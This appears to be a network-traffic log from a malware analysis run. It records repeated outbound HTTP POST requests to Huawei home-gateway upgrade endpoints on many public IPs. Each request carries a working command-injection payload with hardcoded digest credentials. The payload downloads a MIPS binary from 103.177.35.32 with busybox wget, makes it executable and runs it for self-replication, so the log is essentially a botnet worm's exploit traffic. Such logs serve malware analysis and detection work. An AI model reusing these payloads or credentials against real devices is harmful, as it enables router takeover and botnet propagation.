                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1736192.168.2.233474441.62.147.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547668934 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1737192.168.2.235239441.79.250.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.578655958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1738192.168.2.2354676197.55.16.19237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.578664064 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1739192.168.2.2350184157.7.40.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.578711033 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1740192.168.2.2346916146.12.181.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.578711033 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1741192.168.2.234402841.128.246.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.578743935 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1742192.168.2.2344374197.220.36.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583174944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1743192.168.2.2345418197.152.227.11737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583189011 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1744192.168.2.2357366197.232.187.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583266020 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1745192.168.2.2354538157.80.166.3637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583317995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
